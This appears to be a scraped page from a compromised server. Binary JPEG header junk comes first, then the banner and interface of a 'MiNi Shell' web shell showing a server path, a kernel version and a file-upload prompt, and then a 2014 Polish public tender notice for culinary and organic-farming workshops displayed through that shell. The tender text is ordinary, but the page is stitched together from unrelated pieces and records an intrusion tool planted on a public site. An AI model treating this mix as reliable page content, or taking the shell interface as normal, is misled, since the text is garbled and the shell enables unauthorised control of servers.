JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140625/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140625/136039-N-2014.html

<p class="kh_header"><b>Warszawa: Przeprowadzenie warsztatów szkoleniowych i pokazów, związanych ze sztuką kulinarną i produkcją rolną</b><br>
<b>Numer ogłoszenia: 136039 - 2014; data zamieszczenia: 25.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Rynku Rolnego , ul. Nowy Świat 6/12, 00-400 Warszawa, woj. mazowieckie, tel. 22 6617272, faks 22 661 73 79.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arr.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Agencja płatnicza.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie warsztatów szkoleniowych i pokazów, związanych ze sztuką kulinarną i produkcją rolną.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. CPV: 80.31.00.00-0 (Usługi edukacji młodzieży), 80.40.00.00-8 (Usługi edukacji osób dorosłych oraz inne).
2. Przedmiotem zamówienia jest przeprowadzenie - warsztatów, pokazów i szkoleń, dotyczących sztuki kulinarnej związanej z wykorzystaniem produktów regionalnych, tradycyjnych i ekologicznych, a także  promujących zasady zdrowego żywienia oraz edukacji z zakresu prowadzenia ekologicznego gospodarstwa i produkcji ekologicznej żywności. Szczegółowy opis przedmiotu zamówienia zawarty został w załączniku nr 2 do Istotnych Postanowień Umowy, stanowiących załącznik nr 7 do Specyfikacji Istotnych Warunków Zamówienia.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 25.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium w niniejszym postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunki udziału w postępowaniu, jeżeli:
1. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 1: polegającą na prowadzeniu pokazów lub warsztatów kulinarnych w szkołach podstawowych, związanych z promocją zasad zdrowego żywienia, o wartości nie mniejszej niż 4 000,00 zł brutto (słownie: cztery tysiące złotych);
2. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 2: w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w sposób należyty wykonał lub wykonuje co najmniej 1 (słownie: jedną) usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia, tj. polegającą na prowadzeniu pokazów lub warsztatów kulinarnych, obejmujących sporządzanie potraw z gęsiny, o wartości nie mniejszej niż 4 000,00 zł brutto (słownie: cztery tysiące złotych);
3. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 3: w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w sposób należyty wykonał lub wykonuje co najmniej 1 (słownie: jedną) usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia, tj. polegającą na prowadzeniu pokazów lub warsztatów kulinarnych związanych z promocją produktów tradycyjnych, regionalnych, związanych z promocją zasad zdrowego żywienia, o wartości nie mniejszej niż 4 000,00 zł brutto (słownie: cztery tysiące złotych);
4. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 4:	w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w sposób należyty wykonał lub wykonuje co najmniej 1 (słownie: jedną) usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia, tj. polegającą na prowadzeniu pokazów lub warsztatów kulinarnych dotyczących kuchni tradycyjnej i regionalnej, obejmujących swoją tematyką metody wędzenia ryb, o wartości nie mniejszej niż 1 000,00 zł brutto (słownie: jeden tysiąc złotych);
5. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 5: w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w sposób należyty wykonał lub wykonuje co najmniej 1 (słownie: jedną) usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia, tj. polegającą na prowadzeniu pokazów lub warsztatów kulinarnych dotyczących kuchni tradycyjnej i regionalnej, obejmujących przyrządzanie potraw z gęsiny, o wartości nie mniejszej niż 1 000,00 zł brutto (słownie: jeden tysiąc złotych);
6. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 6:	w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w sposób należyty wykonał lub wykonuje co najmniej 1 (słownie: jedną) usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia, tj. polegającą na prowadzeniu pokazów lub warsztatów kulinarnych dotyczących kuchni tradycyjnej i regionalnej, z wykorzystaniem rodzimych gatunków ryb, o wartości nie mniejszej niż 2 000,00 zł brutto (słownie: dwa tysiące złotych);
7. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 7: a)	w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w sposób należyty wykonał lub wykonuje co najmniej 1 (słownie: jedną) usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia, tj. polegającą na prowadzeniu pokazów lub warsztatów kulinarnych związanych z promocją zasad zdrowego żywienia, o wartości nie mniejszej niż 4 000,00 zł brutto (słownie: cztery tysiące złotych); *
b)	w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w sposób należyty wykonał lub wykonuje co najmniej 1 (słownie: jedną) usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia, tj. polegającą na prowadzeniu pokazów lub warsztatów kulinarnych dla personelu stołówek szkolnych, o wartości nie mniejszej niż 4 000,00 zł brutto (słownie: cztery tysiące złotych); *
* w przypadku, gdy wykonane lub wykonywane przez Wykonawcę usługi spełniają równocześnie warunek określony w pkt 7. a) i b), tj. polegają na prowadzeniu pokazów lub warsztatów kulinarnych związanych z promocją zasad zdrowego żywienia dla personelu stołówek szkolnych, Wykonawca może przedstawić w dołączonym do oferty wykazach usług tę samą usługę;
8. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 8:	w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w sposób należyty wykonał lub wykonuje co najmniej 1 (słownie: jedną) usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia, tj. polegającą na prowadzeniu pokazów lub warsztatów kulinarnych w szkołach podstawowych, związanych z promocją produktów regionalnych, tradycyjnych i ekologicznych oraz zasad zdrowego żywienia, o wartości nie mniejszej niż 2 000,00 zł brutto (słownie: dwa tysiące złotych);
9. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 9:	w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w sposób należyty wykonał lub wykonuje co najmniej 1 (słownie: jedną) usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia, tj. polegającą na prowadzeniu pokazów lub warsztatów kulinarnych dla uczniów szkół podstawowych, związanych z promocją zdrowych nawyków żywieniowych, o wartości nie mniejszej niż 4 000,00 zł brutto (słownie: cztery tysiące złotych);
10. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 10: w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w sposób należyty wykonał lub wykonuje co najmniej 1 (słownie: jedną) usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia, tj. polegającą na prowadzeniu pokazów lub warsztatów kulinarnych, związanych z promocją produktów regionalnych, tradycyjnych i ekologicznych, o wartości nie mniejszej niż 2 000,00 zł brutto (słownie: dwa tysiące złotych);
11. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 11: w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w sposób należyty wykonał lub wykonuje co najmniej 1 (słownie: jedną) usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia, tj. polegającą na prowadzeniu pokazów lub warsztatów kulinarnych, związanych z promocją produktów regionalnych, tradycyjnych, o wartości nie mniejszej niż 2 000,00 zł brutto (słownie: dwa tysiące złotych);
12. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 12: w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w sposób należyty wykonał lub wykonuje co najmniej 1 (słownie: jedną) usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia, tj. polegającą na prowadzeniu warsztatów kulinarnych, związanych z promocją produktów regionalnych i tradycyjnych, o wartości nie mniejszej niż 4 000,00 zł brutto (słownie: cztery tysiące złotych);
13. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 13: w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w sposób należyty wykonał lub wykonuje co najmniej 1 (słownie: jedną) usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia, tj. polegającą na prowadzeniu pokazów lub warsztatów kulinarnych, związanych z promocją produktów regionalnych i tradycyjnych oraz zasad zdrowego żywienia, o wartości nie mniejszej niż 2 000,00 zł brutto (słownie: dwa tysiące złotych);
14. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 14: w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w sposób należyty wykonał lub wykonuje co najmniej 1 (słownie: jedną) usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia, tj. polegającą na prowadzeniu pokazów lub warsztatów kulinarnych związanych z promocją produktów regionalnych i tradycyjnych, o wartości nie mniejszej niż 4 000,00 zł brutto (słownie: cztery tysiące złotych);
15. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 15: w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w sposób należyty wykonał lub wykonuje co najmniej 1 (słownie: jedną) usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia, tj. polegającą na prowadzeniu szkoleń z zakresu żywienia dzieci dla osób odpowiedzialnych za żywienie w szkołach, o wartości nie mniejszej niż 2 000,00 zł brutto (słownie: dwa tysiące złotych);
16. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 16: w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w sposób należyty wykonał lub wykonuje co najmniej 1 (słownie: jedną) usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia, polegającą na prowadzeniu pokazów lub warsztatów kulinarnych, związanych z promocją produktów regionalnych i tradycyjnych, o wartości nie mniejszej niż 4 000,00 zł brutto (słownie: cztery tysiące złotych);
17. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 17: w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w sposób należyty wykonał lub wykonuje co najmniej 1 (słownie: jedną) usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia, tj. polegającą na prowadzeniu pokazów lub warsztatów edukacyjno-kulinarnych dla uczniów szkół podstawowych, promujących zasady zdrowego odżywiania, o wartości nie mniejszej niż 2 000,00 zł brutto (słownie: dwa tysiące złotych);
18. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 18: w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w sposób należyty wykonał lub wykonuje co najmniej 1 (słownie: jedną) usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia, tj. polegającą na prowadzeniu pokazów lub  warsztatów kulinarnych, związanych z promocją produktów regionalnych, tradycyjnych i ekologicznych, o wartości nie mniejszej niż 2 000,00 zł brutto (słownie: dwa tysiące złotych);
19. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 19: w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w sposób należyty wykonał lub wykonuje co najmniej 1 (słownie: jedną) usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia, tj. polegającą na prowadzeniu wykładów lub pokazów lub warsztatów kulinarnych, związanych z promocją produktów regionalnych, tradycyjnych i ekologicznych, o wartości nie mniejszej niż 4 000,00 zł brutto (słownie: cztery tysiące złotych);
20. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 20: w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w sposób należyty wykonał lub wykonuje co najmniej 1 (słownie: jedną) usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia, tj. polegającą na prowadzeniu pokazów lub warsztatów edukacyjnych dla wychowanków przedszkoli lub uczniów szkół podstawowych, dotyczących zasad zdrowego żywienia, o wartości nie mniejszej niż 1 000,00 zł brutto (słownie: jeden tysiąc złotych);
21. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 21: w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w sposób należyty wykonał lub wykonuje co najmniej 1 (słownie: jedną) usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia, tj. polegającą na prowadzeniu pokazów lub warsztatów kulinarnych, związanych z promocją produktów regionalnych, tradycyjnych i ekologicznych oraz zasad zdrowego żywienia, o wartości nie mniejszej niż 1 000,00 zł brutto (słownie: jeden tysiąc złotych);
22. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 22: w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w sposób należyty wykonał lub wykonuje co najmniej 1 (słownie: jedną) usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia, tj. polegającą na prowadzeniu warsztatów lub pokazów kulinarnych, związanych z promocją produktów regionalnych i tradycyjnych, o wartości nie mniejszej niż 1 000,00 zł brutto (słownie: jeden tysiąc złotych);
23. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 23: w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w sposób należyty wykonał lub wykonuje co najmniej 1 (słownie: jedną) usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia, tj. polegającą na prowadzeniu pokazów lub warsztatów edukacyjno-kulinarnych dla dzieci, związanych z produkcją rolną lub przetwórstwem produktów rolno-spożywczych lub promujące tradycje kulinarne regionu, o wartości nie mniejszej niż 1 000,00 zł brutto (słownie: jeden tysiąc złotych);
24. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 24: w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w sposób należyty wykonał lub wykonuje co najmniej 1 (słownie: jedną) usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia, tj. polegającą na prowadzeniu pokazów lub warsztatów edukacyjnych, dotyczących ekologicznej produkcji w gospodarstwach rolnych lub agroturystycznych, o wartości nie mniejszej niż 2 000,00 zł brutto (słownie: dwa tysiące złotych);
25. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 25: w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w sposób należyty wykonał lub wykonuje co najmniej 1 (słownie: jedną) usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia, tj. polegającą na prowadzeniu warsztatów lub pokazów kulinarnych, związanych z promocją produktów regionalnych, tradycyjnych i ekologicznych, o wartości nie mniejszej niż 2 000,00 zł brutto (słownie: dwa tysiące złotych).
UWAGA: W przypadku podania wartości usług w walucie innej niż PLN, w celu oceny spełniania ww. warunku Zamawiający dokona przeliczenia wskazanej kwoty na PLN według średniego kursu Narodowego Banku Polskiego obowiązującego w dniu publikacji ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunki udziału w postępowaniu, jeżeli:
1. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 21: dysponuje gospodarstwem ekologicznym położonym na terenie województwa opolskiego;
2. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 23: dysponuje gospodarstwem  edukacyjnym położonym na terenie województwa mazowieckiego;
3. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 24:	dysponuje gospodarstwem ekologicznym położonym na terenie województwa mazowieckiego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunki udziału w postępowaniu, jeżeli:
1. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 1: dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe o kierunku gastronomicznym lub żywieniowym, lub dyplom mistrzowski w zawodzie kucharz;
2. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 2: dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe o kierunku gastronomicznym lub żywieniowym, lub dyplom mistrzowski w zawodzie kucharz;
3. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 3: dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe o kierunku gastronomicznym lub żywieniowym lub dyplom mistrzowski w zawodzie kucharz;
4. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 4: dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe o kierunku gastronomicznym lub żywieniowym, lub dyplom mistrzowski w zawodzie kucharz;
5. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 5: dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe o kierunku gastronomicznym lub żywieniowym lub dyplom mistrzowski w zawodzie kucharz;
6. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 6: dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe o kierunku gastronomicznym lub żywieniowym, lub dyplom mistrzowski w zawodzie kucharz;
7. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 7: a) dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe w zakresie żywienia lub dietetyki, oraz
b) dysponuje przynajmniej jedną osobą, która posiada dyplom mistrzowski w zawodzie kucharz;
8. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 8: dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe o kierunku gastronomicznym lub żywieniowym, lub dyplom mistrzowski w zawodzie kucharz;
9. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 9: dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe o kierunku gastronomicznym lub dyplom mistrzowski w zawodzie kucharz;
10. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 10: dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe o kierunku gastronomicznym lub dyplom mistrzowski w zawodzie kucharz;
11. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 11: dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe o kierunku gastronomicznym lub żywieniowym, lub dyplom mistrzowski w zawodzie kucharz;
12. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 12: dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe o kierunku gastronomicznym lub żywieniowym, lub dyplom mistrzowski w zawodzie kucharz;
13. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 13: dysponuje przynajmniej jedną osobą, która:
posiada wykształcenie wyższe o kierunku gastronomicznym lub żywieniowym, lub dyplom mistrzowski w zawodzie kucharz, oraz
posiada wiedzę z zakresu tematyki produktów regionalnych i tradycyjnych potwierdzoną zaświadczeniem o ukończeniu kursu z podmiotu prowadzącego szkolenia tego typu lub wcześniej realizowanymi umowami na przeprowadzenie wykładów o tej tematyce;
14. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 14: dysponuje przynajmniej jedną osobą, która:
posiada wykształcenie wyższe o kierunku gastronomicznym lub żywieniowym, lub dyplom mistrzowski w zawodzie kucharz, oraz
posiada wiedzę z zakresu tematyki produktów regionalnych i tradycyjnych potwierdzoną zaświadczeniem o ukończeniu kursu z podmiotu prowadzącego szkolenia tego typu lub wcześniej realizowanymi umowami na przeprowadzenie wykładów o tej tematyce;
15. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 15: dysponuje przynajmniej jedną osobą, która:
jest dietetykiem i posiada wykształcenie wyższe o kierunku żywieniowym, oraz
posiada wiedzę z zakresu kuchni tradycyjnej potwierdzoną zaświadczeniem o ukończeniu kursu z podmiotu prowadzącego szkolenia tego typu lub wcześniej realizowaną/ymi umową/ami na przeprowadzenie wykładów o tej tematyce;
16. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 16: dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe o kierunku gastronomicznym lub żywieniowym, lub dyplom mistrzowski w zawodzie kucharz;
17. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 17: dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe o kierunku gastronomicznym lub żywieniowym, lub dyplom mistrzowski w zawodzie kucharz;
18. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 18:
dysponuje przynajmniej jedną osobą, która:
posiada wykształcenie wyższe o kierunku gastronomicznym lub żywnościowym, lub
posiada wykształcenie zasadnicze lub średnie o kierunku gastronomicznym lub żywnościowym oraz 5-letnie doświadczenie na stanowisku szef kuchni, lub
posiada dyplom mistrzowski w zawodzie kucharz;
19. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 19: dysponuje przynajmniej jedną osobą, która:
posiada wykształcenie wyższe o kierunku gastronomicznym lub żywnościowym, lub
posiada wykształcenie zasadnicze lub średnie o kierunku gastronomicznym lub żywnościowym oraz 5-letnie doświadczenie na stanowisku szef kuchni, lub
posiada dyplom mistrzowski w zawodzie kucharz;
20. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 20: dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe o kierunku biologicznym lub żywieniowym lub medycznym;
